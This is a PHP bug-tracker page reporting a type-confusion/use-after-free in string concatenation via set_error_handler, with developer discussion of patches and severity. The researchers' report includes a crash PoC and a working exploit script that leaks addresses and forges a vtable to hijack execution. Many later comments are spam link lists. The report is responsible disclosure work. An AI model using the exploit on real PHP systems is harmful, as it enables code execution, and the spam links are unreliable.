PHP :: Bug #81705 :: type confusion/UAF on set_error

Bug #81705

type confusion/UAF on set_error_handler with concat operation

Submitted:

2022-01-04 08:17 UTC

Modified:

2023-05-16 21:09 UTC

Votes:	17
Avg. Score:	4.1 ± 1.3
Reproduced:	9 of 12 (75.0%)
Same Version:	8 (88.9%)
Same OS:	9 (100.0%)

From:

yukik at ricsec dot co dot jp

Assigned:

nielsdos (profile)

Status:

Closed

Package:

Scripting Engine problem

PHP Version:

8.0.14

OS:

Linux

Private report:

CVE-ID:

None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	yukik at ricsec dot co dot jp
New email:
PHP Version:		OS:

New Comment:

[2022-01-04 08:17 UTC] yukik at ricsec dot co dot jp

Description:
------------
Hello, all.
I reported this issue was reported on Nov 11, 2021 via e-mail, but we have no response still. So I'm reposting this issue here as we said in the last reply.

Before writing a patch, we need to discuss how to fix this.
So would you respond to us?
Some of the solutions will spoil backward compatibility.

The following is the same as the content of the first mail.

----

Hello, my name is Yuki Koike. I'm a security researcher working at a Japanese company.
Several days ago, my colleague Hiroyuki Katsura(who is cc'ed) and I found a use-after-free bug in PHP.
We've already confirmed that this bug exists even in php-8.1.0RC6(on the github repo), and also that this bug is exploitable if an attacker is allowed to manipulate variables freely to some extent.

# PoC

Here is a proof of concept for crash reproduction:

```
<?php

$my_var = str_repeat("a", 1);
set_error_handler(
    function() use(&$my_var) {
        echo("error\n");
        $my_var = 0x123;
    }
);
$my_var .= [0];

?>
```

If you execute this snippet, it should cause SEGV at address 0x123.

# Root Cause

When PHP executes the line `$my_var .= [0];`, it calls `concat_function` defined in Zend/zend_operators.c to try to concat given values.
Since the given values may not be strings, `concat_function`tries to convert them into strings with `zval_get_string_func`(https://github.com/php/php-src/blob/master/Zend/zend_operators.c#L1900).

If the given value is an array, `zval_get_string_func` calls `zend_error`(https://github.com/php/php-src/blob/master/Zend/zend_operators.c#L965).
Because we can register an original error handler that is called by `zend_error` by using `set_error_handler`, we can run almost arbitrary codes DURING `concat_function` is running. 

In the above PoC, for example, `$my_var` will be overwritten with integer 0x123 when `zend_error` is triggered. `concat_function`, however, implicitly assumes the variables `op1` and `op2` are always strings, and thus type confusion occurs as a result.

# Exploitability

With the exploit attached below, we confirmed that an attacker can leak memory addresses and can make the program jump to an arbitrary address. When we attached gdb to PHP, we saw the following output(address 0xdeadbeeffeedface is specified by us):

```
Program received signal SIGSEGV, Segmentation fault.
0x0000559ad8711091 in zend_objects_store_del ()
(gdb) disas $rip, +0x1
Dump of assembler code from 0x559ad8711091 to 0x559ad8711092:
=> 0x0000559ad8711091 <zend_objects_store_del+209>: callq  *0x10(%rax)
End of assembler dump.
(gdb) x/xg $rax+0x10
0x7f589485d5a8: 0xdeadbeeffeedface
```

We tested the exploit with php8.0 installed from ppa:ondrej/php via apt, on a docker container of ubuntu:20.04. Because we wanted to report this issue as fast as possible, the exploit is "rough" in the sense that it heavily depends on the execution environment, such as the version of PHP binary and shared libraries. Therefore, unlike the above PoC, you may be unable to reproduce the above SEGV(let me know in that case). But, that doesn't mean this vulnerability is useless for reliable exploitation. If someone writes an exploit carefully by employing some techniques to stabilize exploits, such as heap spraying, the exploit would always succeed.

Here is the exploit:
```
<?php

/*

# cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION=“Ubuntu 20.04.1 LTS”

# apt show php8.0
Package: php8.0
Version: 8.0.12-1+ubuntu20.04.1+deb.sury.org+1
Priority: optional
Section: php
Maintainer: Debian PHP Maintainers <team+pkg-php@tracker.debian.org>
Installed-Size: 65.5 kB
Provides: php
Depends: libapache2-mod-php8.0 | php8.0-fpm | php8.0-cgi, php8.0-common
Download-Size: 29.3 kB
APT-Manual-Installed: yes
APT-Sources: http://ppa.launchpad.net/ondrej/php/ubuntu focal/main amd64 Packages
Description: server-side, HTML-embedded scripting language (metapackage)

# md5sum $(which php8.0)
7e0d9628ecbe29b36ce692278673fa76  /usr/bin/php8.0

 */

// Just for attaching a debugger.
// Removing these lines makes the exploit fail,
// but it doesn't mean this exploit depends on fopen.
// By considering the heap memory that had been allocated for the stream object and
// adjusting heap memory, the exploit will succeed again.
$f = fopen(‘php://stdin’, ‘r’); 
fgets($f);

$my_var = [[1,2,3,4],[1,2,3,4]];
set_error_handler(function() use(&$my_var,&$buf){
    $my_var=1;
    $buf=str_repeat(“xxxxxxxx\x00\x00\x00\x00\x00\x00\x00\x00", 16);
});
$my_var[1] .= 1234;

$obj_addr = 0;
for ($i = 23; $i >= 16; $i--){
    $obj_addr *= 256;
    $obj_addr += ord($buf[$i]);
}
$obj_addr -= 0x10348;
printf(“obj addr = ‘%x’\n”, $obj_addr);

$my_var2 = [[1,2,3,4],[1,2,3,4]];
set_error_handler(function() use(&$my_var2,&$buf2,&$obj_addr){
    $my_var2=1;
    $buf2=str_repeat(“x”, 0x100);
    for ($i=0; $i < 8; $i++) {
        $buf2[0x10 + $i] = chr(($obj_addr >> ($i*8)) & 0xff);
    }

    $buf2[0x20] = chr(1);
    for ($i=1; $i < 4; $i++) {
         $buf2[0x20 + $i] = chr(0);
    }

    $buf2[0x24] = chr(6);
});
$my_var2[1] .= 1234;

$victim = function () {};

$lower = 0xfeedface;
$upper = 0xdeadbeef;

for ($j=0; $j<8; $j++) {
    for ($i=0; $i<4; $i++) {
        $buf2[0x40 + $j*8 + $i] = chr(($lower >> ($i*8)) & 0xff);
    }
    for ($i=0; $i<4; $i++) {
        $buf2[0x44 + $j*8 + $i] = chr(($upper >> ($i*8)) & 0xff);
    }
}

$fake_vtable_address = $obj_addr + 0x20;
for ($i=0; $i<8; $i++) {
    $buf2[0x38 + $i] = chr(($fake_vtable_address >> ($i*8)) & 0xff);
}

?>
```

# Proposal for revision

Since we can execute almost arbitrary codes with set_error_handler, I think removing the call of `zend_error` and throwing a non-hookable error instead is the easiest fix.
If that fix is not appropriate for some reason like backward compatibility, we should carefully think about how to fix it. To be honest, I'm still not sure what is the best way in that case. We need to discuss it.

# Acknowledgement

We found this issue with some fuzzers during our experiment for our academic paper.
Since PHP has already provided how to build PHP with instrumentation and how to run fuzzers at oss-fuzz, the preparation went smoothly. We deeply appreciate your effort of preparing build scripts and harnesses. 
It would be great if you would assign a CVE number to this bug, so that we can refer to it in our paper.

Sincerely,
Yuki 

Test script:
---------------
<?php

$my_var = str_repeat("a", 1);
set_error_handler(
    function() use(&$my_var) {
        echo("error\n");
        $my_var = 0x123;
    }
);
$my_var .= [0];

?>

Expected result:
----------------
No SEGV should happen.

Actual result:
--------------
You will see a crash with the message "SEGV on address 0x123".

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2022-01-04 12:26 UTC] cmb@php.net

Thanks for reporting!  I can reproduce the segfault; it wouldn't
happen with the given test script if the optimizer is enabled, but
a slight variation can work around that.

It seems to me the most straightforward fix is to check that op1
and op2 are actually IS_STRING before we assume they are, and bail
out otherwise.  Suggested patch for PHP-8.0:

<https://gist.github.com/cmb69/05f18d11ac5cf4c70d3514f24787f087>

Given that the exploit requires pathological code, I don't think
that qualifies as security issue according to our
classification[1].  I'll let that for others to decide.  If it is
a security issue, PHP-7.4 likely needs to be fixed as well.

[1] <https://wiki.php.net/security>

[2022-01-05 02:21 UTC] stas@php.net

-Type: Security +Type: Bug

[2022-01-05 02:22 UTC] stas@php.net

Definitely not a security issue, requires special complicated code to trigger.

[2022-01-05 04:52 UTC] yukik at ricsec dot co dot jp

Hello, cmb and stas

First of all, I appreciate your very fast replies.
And cmb's patch looks great to me.
I was afraid of causing another UAF by using op1 and op2 in the validation, 
but I realized op1->u1.v.type won't be freed as I watched your patch.

I'm just wondering if this is actually not a security issue.
Of course, I've read https://wiki.php.net/security before submitting this.
As you pointed out, definitely this should not be considered as High severity.
But at the same time, this issue doesn't meet the conditions written in the section "Not a security issue". The bug just requires some uncommon code pattern. So I think this bug has Medium or Low secerity.

And, I might have caused some misleadings by attaching a too long PoC for arbitrary memory write. To cause a UAF, 
just the following 4 lines

$my_var = [[1,2,3,4],[1,2,3,4]];
set_error_handler(function() use(&$my_var,&$buf){
    $my_var=1;
});
$my_var[1] .= 1234;

are enough. If this kind of code pattern can be seen in a product, that immediately leads to UAF(there is no need for attackers to set his own error handler). There might be another simple way to abuse this. My PoC was just too long.

I would appreciate if I can hear your opinion considering these. 
I respect your decision no matter what it is.

[2022-01-05 15:13 UTC] cmb@php.net

-Status: Open +Status: Verified

[2022-01-05 15:13 UTC] cmb@php.net

Contrary to the type confusion, which my patch would solve, the
UAF scenario is way more tricky.  I don't see a way to cleanly
solve that, besides throwing an exception instead of raising a
warning for attempted array to string conversion, but we cannot do
that for BC reasons.  We also cannot simply suppress the warning
while doing concat_function(), because there are many legitimate
cases where that might be a relevant warning, not causing any
particular issues.

[2022-01-06 09:42 UTC] yukik at ricsec dot co dot jp

> Contrary to the type confusion, which my patch would solve, the
UAF scenario is way more tricky. 

Oh, is there any case where where not only op1.value but also op1 itself will be freed?
If BC matters, then it seems we have to carefully increment/decrement refcounts of them...

[2022-01-06 22:45 UTC] cmb@php.net

The problem is that `result` gets released[1] if it is identical
to `op1_orig` (which is always the case for the concat assign
operator).  For the script from comment 1641358352[2], that
decreases the refcount to zero, but on shutdown, the literal
stored in the op array will be released again.  If that script is
modified to use a dynamic value (`range(1,4)` instead of
`[1,2,3,4]`), its is already freed, when that code in
`concat_function()` tries to release it again.

[1] <https://github.com/php/php-src/blob/php-8.1.1/Zend/zend_operators.c#L1928>
[2] <https://bugs.php.net/bug.php?id=81705#1641358352>

[2022-12-22 11:08 UTC] janettabloomquist at gmail dot com

`concat_function`, however, implicitly assumes the variables `op1` and `op2` are always strings, and thus type confusion occurs as a result.  UAF due to php_filter_float() failing for ints (CVE-2021-21708) ... (Potential type confusion in unixtojd() parameter parsing).  
(https://www.myhealthonline.biz/)github.com

[2023-01-03 10:50 UTC] robertnldspj11 at gmail dot com

A commitment of appreciation is all together for the update and quick reply. Bet upon your string. A commitment of appreciation is all together for making it. Appreciative for sharing such mind blowing information. (https://www.myeclass.me/)github.com

[2023-02-16 20:35 UTC] master at gmail dot com

https://www.theverge.com/users/ketoplanet2121).php.net
https://docs.google.com/forms/d/e/1FAIpQLSed4L-W5rcs7dhIZBZw61FL5Vqo4mAs1OAu62udWU1czVBZ6g/viewform).php.net

[2023-02-22 00:57 UTC] medd at gmail dot com

https://gitbub.com(https://www.bing.com/search?q=mybestsleepever)php.net

[2023-02-22 00:59 UTC] medd at gmail dot com

A commitment of appreciation is all together for the update and quick reply. Bet upon your string. A commitment of appreciation is all together for making it. Appreciative for sharing such mind blowing information. (https://www.bing.com/search?q=mybestsleepever/)github.com

[2023-02-22 01:05 UTC] medd at gmail dot com

Does it work for you on a different platform?
(https://scholar.google.co.id/citations?hl=en&user=z2zPgJAAAAAJ/)github.com
(https://scholar.google.co.uk/citations?hl=en&user=z2zPgJAAAAAJ/)github.com
(https://scholar.google.com.au/citations?hl=en&user=z2zPgJAAAAAJ/)github.com

[2023-02-22 01:11 UTC] medd at gmail dot com

Don't clutter the database with that please
(https://search.yahoo.com/search?p=mybestsleepever/)github.com

[2023-02-22 01:26 UTC] medd at gmail dot com

Don't encrip the database MangoDB
(https://duckduckgo.com/?q=mybestsleepever/)github.com
(https://www.ask.com/web?q=mybestsleepever/)github.com

[2023-02-23 04:10 UTC] medd at gmail dot com

(https://docs.google.com/forms/d/e/1FAIpQLSed4L-W5rcs7dhIZBZw61FL5Vqo4mAs1OAu62udWU1czVBZ6g/viewform/)github.com

[2023-02-26 10:42 UTC] master dot tra dot ining365 at gmail dot com

(https://pastelink.net/d1g7rycn/)github.com
(https://pastelink.net/d1g7rycn/)github.com
(https://scholar.google.com.pa/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.com.pe/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.com.ph/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.com.pk/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.co.kr/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.com.mx/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.com.my/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.com.ni/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.nl/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.no/citations?user=7mSx2nwAAAAJ)github.com
(https://scholar.google.co.nz/citations?user=7mSx2nwAAAAJ)github.com

[2023-02-26 10:52 UTC] ma dot ster dot train dot ing365 at gmail dot com

(https://pastelink.net/d1g7rycn/)php.net
(https://pastelink.net/lwrd0wqg/)php.net

[2023-04-07 16:02 UTC] moroccotripexcursions at gmail dot com

wonderful blog 


(https://morocco-itinerary.com/tour/2-day-sahara-desert-tour-from-fes/)github.com

(https://morocco-itinerary.com/tour/2-days-morocco-desert-tour-from-fes/)github.com

(https://morocco-itinerary.com/tour/3-days-to-sahara-desert-tour-from-fes/)github.com

(https://morocco-itinerary.com/tour/3-days-morocco-tour-from-fes/)github.com

(https://morocco-itinerary.com/tour/fes-to-marrakech-4-days-tour/)github.com

(https://morocco-itinerary.com/tour/5-days-morocco-desert-tour/)github.com

(https://morocco-itinerary.com/tour/6-days-tour-in-morocco-from-fes-to-marrakech/)github.com

(https://morocco-itinerary.com/tour/6-days-holiday-tour-in-morocco/)github.com

(https://morocco-itinerary.com/tour/7-days-in-morocco-starting-in-fes/)github.com

(https://morocco-itinerary.com/tour/7-days-in-morocco-itinerary-from-fes/)github.com

(https://morocco-itinerary.com/tour/8-days-imperial-cities-morocco-tour/)github.com

(https://morocco-itinerary.com/tour/morocco-itinerary-8-days/)github.com

(https://morocco-itinerary.com/tour/9-days-morocco-tour-itinerary/)github.com

(https://morocco-itinerary.com/tour/10-day-trip-to-morocco/)github.com

(https://morocco-itinerary.com/tour/10-day-morocco-itinerary-from-fes/)github.com

(https://morocco-itinerary.com/tour/11-days-tour-in-morocco-from-fes/)github.com

(https://morocco-itinerary.com/tour/morocco-itinerary-12-days/)github.com

(https://morocco-itinerary.com/tour/13-days-morocco-tour-from-fes/)github.com

[2023-04-07 16:18 UTC] karaouim081 at gmail dot com

super its unbelievable 



(https://morocco-itinerary.com/tour/5-days-tour-from-tangier-in-morocco/)github.com

(https://morocco-itinerary.com/tour/6-days-morocco-tour-itinerary-from-tangier-to-marrakech/)github.com

(https://morocco-itinerary.com/tour/morocco-itinerary-7-days-from-tangier/)github.com

(https://morocco-itinerary.com/tour/8-days-morocco-travel/)github.com

(https://morocco-itinerary.com/tour/9-days-trip-in-morocco/)github.com

(https://morocco-itinerary.com/tour/morocco-itinerary-10-days/)github.com

(https://morocco-itinerary.com/tour/morocco-travel-itinerary-10-days/)github.com

(https://morocco-itinerary.com/tour/11-day-in-morocco-tour-from-tangier/)github.com

(https://morocco-itinerary.com/tour/12-days-morocco-itinerary-tour/)github.com

(https://morocco-itinerary.com/tour/13-days-in-morocco-tour-from-tangier-itinerary/)github.com

(https://morocco-itinerary.com/tour/morocco-itinerary-2-weeks/)github.com

(https://morocco-itinerary.com/tour/2-days-morocco-tour-from-casablanca/)github.com

(https://morocco-itinerary.com/tour/3-day-tour-from-casablanca-to-essaouira/)github.com

(https://morocco-itinerary.com/tour/morocco-4-days-itinerary-tour-from-casablanca/)github.com

(https://morocco-itinerary.com/tour/5-days-morocco-tour-itinerary/)github.com

(https://morocco-itinerary.com/tour/5-days-morocco-tour-itinerary/)github.com

(https://morocco-itinerary.com/tour/6-days-in-morocco-itinerary/)github.com

(https://morocco-itinerary.com/tour/7-days-morocco-travel/)github.com

(https://morocco-itinerary.com/tour/8-day-tour-in-morocco-from-casablanca/)github.com

(https://morocco-itinerary.com/tour/9-days-tour-from-casablanca/)github.com

(https://morocco-itinerary.com/tour/10-days-morocco-travel/)github.com

(https://morocco-itinerary.com/tour/10-day-morocco-tour-from-casablanca-2/)github.com

(https://morocco-itinerary.com/tour/morocco-12-day-tour-from-casablanca/)github.com


(https://morocco-itinerary.com/tour/14-day-tour-in-morocco/)github.com


(https://morocco-itinerary.com/tour/grand-tour-morocco/)github.com

(https://morocco-itinerary.com/tour/19-days-morocco-tour/)github.com

(https://morocco-itinerary.com/tour/morocco-north-3-days/)github.com

(https://morocco-itinerary.com/tour/morocco-itinerary-5-days-from-rabat/)github.com

(https://morocco-itinerary.com/tour/8-day-morocco-itinerary-from-rabat/)github.com

(https://morocco-itinerary.com/tour/7-days-tour-in-morocco-from-agadir/)github.com


(https://morocco-itinerary.com/tour/20-day-tour-in-morocco-from-agadir/)github.com

[2023-04-07 17:46 UTC] africanorthjourneys at gmail dot com

wonderful blog full of value thanks for the sharing


(https://morocco-itinerary.com/it/tour/tour-di-2-giorni-in-marocco-da-marrakech-2/)github.com

(https://morocco-itinerary.com/it/tour/3-giorni-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-marocco-3-giorni-da-marrakech-a-fez-e-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/4-giorni-viaggio-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-4-giorni-in-marocco-da-marrakech-a-fez/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-di-5-giorni-da-marrakech-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-5-giorni-da-marrakech-a-fez-attraverso-il-deserto/)github.com

(https://morocco-itinerary.com/it/tour/itinerario-di-6-giorni-in-marocco-tour-da-marrakech-a-fes/)github.com

(https://morocco-itinerary.com/it/tour/7-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/8-giorni-in-marocco-da-marrakech-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-10-giorni-in-marocco-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-11-giorni-in-marocco-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-11-giorni-in-marocco-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-12-giorni-in-marocco-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-13-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/tour-da-fes-a-marrakech-2-giorni/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-in-marocco-2-giorni-da-fes-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-3-giorni-in-marocco-da-fes-al-deserto-e-fine-a-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-deserto-marocco-3-giorni/)github.com

(https://morocco-itinerary.com/it/tour/tour-marocco-4-giorni-da-fes-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/tour-marocco-4-giorni-da-fes-al-deserto-e-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/5-giorni-da-fes-a-marrakech-tour/)github.com

(https://morocco-itinerary.com/it/tour/6-giorni-viaggio-in-marocco/)github.com


(https://morocco-itinerary.com/it/tour/tour-marocco-7-giorni-da-fes-al-deserto/)github.com


(https://morocco-itinerary.com/it/tour/tour-marocco-8-giorni/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-9-giorni-in-marocco-da-fez/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-10-giorni-in-marocco-da-fez/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-di-11-giorni-in-marocco-da-fez/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-12-giorni-in-marocco-da-fez/)github.com

(https://morocco-itinerary.com/it/tour/13-giorni-viaggio-in-marocco-da-fez/)github.com


(https://morocco-itinerary.com/it/tour/viaggio-di-6-giorni-in-marocco-da-casablanca/)github.com


(https://morocco-itinerary.com/it/tour/viaggio-di-5-giorni-da-marrakech-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-5-giorni-da-marrakech-a-fez-attraverso-il-deserto/)github.com

(https://morocco-itinerary.com/it/tour/itinerario-di-6-giorni-in-marocco-tour-da-marrakech-a-fes/)github.com

(https://morocco-itinerary.com/it/tour/7-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/8-giorni-in-marocco-da-marrakech-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-10-giorni-in-marocco-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-11-giorni-in-marocco-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-11-giorni-in-marocco-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-12-giorni-in-marocco-da-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-13-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/tour-da-fes-a-marrakech-2-giorni/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-in-marocco-2-giorni-da-fes-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-3-giorni-in-marocco-da-fes-al-deserto-e-fine-a-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/tour-deserto-marocco-3-giorni/)github.com

(https://morocco-itinerary.com/it/tour/tour-marocco-4-giorni-da-fes-al-deserto/)github.com

(https://morocco-itinerary.com/it/tour/tour-marocco-4-giorni-da-fes-al-deserto-e-marrakech/)github.com

(https://morocco-itinerary.com/it/tour/5-giorni-da-fes-a-marrakech-tour/)github.com

(https://morocco-itinerary.com/it/tour/6-giorni-viaggio-in-marocco/)github.com


(https://morocco-itinerary.com/it/tour/tour-marocco-7-giorni-da-fes-al-deserto/)github.com


(https://morocco-itinerary.com/it/tour/tour-marocco-8-giorni/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-9-giorni-in-marocco-da-fez/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-10-giorni-in-marocco-da-fez/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-di-11-giorni-in-marocco-da-fez/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-12-giorni-in-marocco-da-fez/)github.com

(https://morocco-itinerary.com/it/tour/13-giorni-viaggio-in-marocco-da-fez/)github.com


(https://morocco-itinerary.com/it/tour/viaggio-di-6-giorni-in-marocco-da-casablanca/)github.com


(https://morocco-itinerary.com/it/tour/circuito-di-7-giorni-in-marocco-da-casablanca/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-di-8-giorni-in-marocco-da-casablanca/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-di-9-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/tour-marocco-10-giorni/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-11-giorni-in-marocco-da-casablanca/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-12-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-di-13-giorni-in-marocco-da-casablanca/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-14-giorni-in-marocco-da-casablanca/)github.com

(https://morocco-itinerary.com/it/tour/tour-marocco-15-giorni-da-casablanca/)github.com

(https://morocco-itinerary.com/it/tour/6-giorni-viaggio-in-marocco-da-tangeri/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-7-giorni-in-marocco-da-tangeri/)github.com

(https://morocco-itinerary.com/it/tour/cosa-vedere-in-marocco-in-7-giorni-2/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-8-giorni-in-marocco-da-tangeri/)github.com

(https://morocco-itinerary.com/it/tour/tour-marocco-da-tangeri-9-giorni/)github.com

(https://morocco-itinerary.com/it/tour/10-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-10-giorni-in-marocco-da-tangeri/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-11-giorni-in-marocco-da-tangeri/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-12-giorni-in-marocco-da-tangeri/)github.com

(https://morocco-itinerary.com/it/tour/tour-delle-citta-imperiali-del-marocco-13-giorni/)github.com

(https://morocco-itinerary.com/it/tour/viaggio-di-14-giorni-in-marocco/)github.com

(https://morocco-itinerary.com/it/tour/tour-di-15-giorni-in-marocco-da-tangeri/)github.com

[2023-04-07 18:27 UTC] moroccotripexcursions at gmail dot com

wonderful blog full of value thanks for the sharing


(https://morocco-itinerary.com/es/tour/2-dias-desde-marrakech-al-desierto-2/)github.com

(https://morocco-itinerary.com/es/tour/recomendaciones-para-viajar-a-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/escapada-marrakech-3-dias/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-en-4-dias-que-hacer/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-viaje-5-dias/)github.com

(https://morocco-itinerary.com/es/tour/vacaciones-en-marruecos-5-dias/)github.com

(https://morocco-itinerary.com/es/tour/6-dias-en-marruecos-viajes/)github.com

(https://morocco-itinerary.com/es/tour/itinerario-marruecos-7-dias/)github.com

(https://morocco-itinerary.com/es/tour/visitar-marruecos-en-7-dias/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-8-dias/)github.com

(https://morocco-itinerary.com/es/tour/tour-marruecos-de-9-dias/)github.com

(https://morocco-itinerary.com/es/tour/visitar-marruecos-en-10-dias/)github.com

(https://morocco-itinerary.com/es/tour/ruta-marruecos-10-dias/)github.com

(https://morocco-itinerary.com/es/tour/gran-vuelta-a-marruecos-en-11-dias/)github.com

(https://morocco-itinerary.com/es/tour/tour-por-marruecos-12-dias/)github.com

(https://morocco-itinerary.com/es/tour/2-dias-viajes-en-marruecos-desde-fez-al-desierto/)github.com

(https://morocco-itinerary.com/es/tour/3-dias-desde-fez-al-desierto-de-merzouga/)github.com

(https://morocco-itinerary.com/es/tour/3-dias-de-fez-a-marrakech-por-el-desierto/)github.com

(https://morocco-itinerary.com/es/tour/4-dias-desde-fez-al-desierto-y-marrakech-2/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-4-dias-desde-fez-al-desierto/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-5-dias-4-noches-desde-marrakech/)github.com

(https://morocco-itinerary.com/es/tour/circuito-marruecos-6-dias/)github.com

(https://morocco-itinerary.com/es/tour/viaje-de-7-dias-en-marruecos-desde-fez/)github.com


(https://morocco-itinerary.com/es/tour/viaje-marruecos-7-dias/)github.com


(https://morocco-itinerary.com/es/tour/circuito-por-marruecos-8-dias/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-en-9-dias/)github.com

(https://morocco-itinerary.com/es/tour/mejor-10-dias-en-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/recorrer-marruecos-en-10-dias/)github.com

(https://morocco-itinerary.com/es/tour/ruta-de-10-dias-en-marruecos-desde-fez/)github.com

(https://morocco-itinerary.com/es/tour/11-dias-en-marruecos-desierto-y-ciudades-imperiales/)github.com


(https://morocco-itinerary.com/es/tour/tour-de-12-dias-en-marruecos/)github.com


(https://morocco-itinerary.com/es/tour/tour-de-13-dias-en-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/tour-norte-de-marruecos-4-dias/)github.com

(https://morocco-itinerary.com/es/tour/5-dias-de-viaje-a-marruecos-desde-casablanca/)github.com

(https://morocco-itinerary.com/es/tour/ruta-por-marruecos-en-6-dias-desde-casablanca/)github.com

(https://morocco-itinerary.com/es/tour/viaje-de-7-dias-al-norte-de-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/viaje-de-7-dias-alrededor-de-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/excursion-desde-casablanca-8-dias/)github.com

(hhttps://morocco-itinerary.com/es/tour/viaje-privado-de-9-dias-por-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-viaje-por-10-dias/)github.com

(https://morocco-itinerary.com/es/tour/descubra-marruecos-en-10-dias/)github.com

(https://morocco-itinerary.com/es/tour/ruta-de-11-dias-por-marruecos-desde-casablanca/)github.com

(https://morocco-itinerary.com/es/tour/tour-de-12-dias-por-marruecos-desde-casablanca/)github.com

(https://morocco-itinerary.com/es/tour/ruta-de-13-dias-en-marruecos-desde-casablanca/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-en-13-dias-de-viaje-desde-casablanca/)github.com

(https://morocco-itinerary.com/es/tour/ruta-de-14-dias-en-marruecos-desde-casablanca/)github.com

(https://morocco-itinerary.com/es/tour/5-dias-en-el-norte-de-marruecos-desde-tanger/)github.com

(https://morocco-itinerary.com/es/tour/ruta-de-6-dias-desde-en-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/ruta-7-dias-marruecos/)github.com


(https://morocco-itinerary.com/es/tour/itinerario-de-7-dias-en-marruecos/)github.com


(https://morocco-itinerary.com/es/tour/viaje-de-8-dias-desde-tanger-en-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/9-dias-en-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-10-dias-desde-tanger/)github.com

(https://morocco-itinerary.com/es/tour/10-dias-de-vacaciones-en-marruecos/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-11-dias-desde-tanger/)github.com

(https://morocco-itinerary.com/es/tour/marruecos-en-12-dias/)github.com


(https://morocco-itinerary.com/es/marruecos-viajes/)github.com


(https://morocco-itinerary.com/es/terminos-condiciones/)github.com

(https://morocco-itinerary.com/es/sobre-nosotros-el-equipo/)github.com

(https://morocco-itinerary.com/es/resenas/)github.com

(https://morocco-itinerary.com/es/resenas/)github.com

(https://morocco-itinerary.com/es/tour-destination/tanger-es/)github.com

(https://morocco-itinerary.com/es/tour-destination/marrakech-es/)github.com

(https://morocco-itinerary.com/es/tour-destination/fez-es/)github.com

(https://morocco-itinerary.com/es/tour-destination/casablanca-es/)github.com

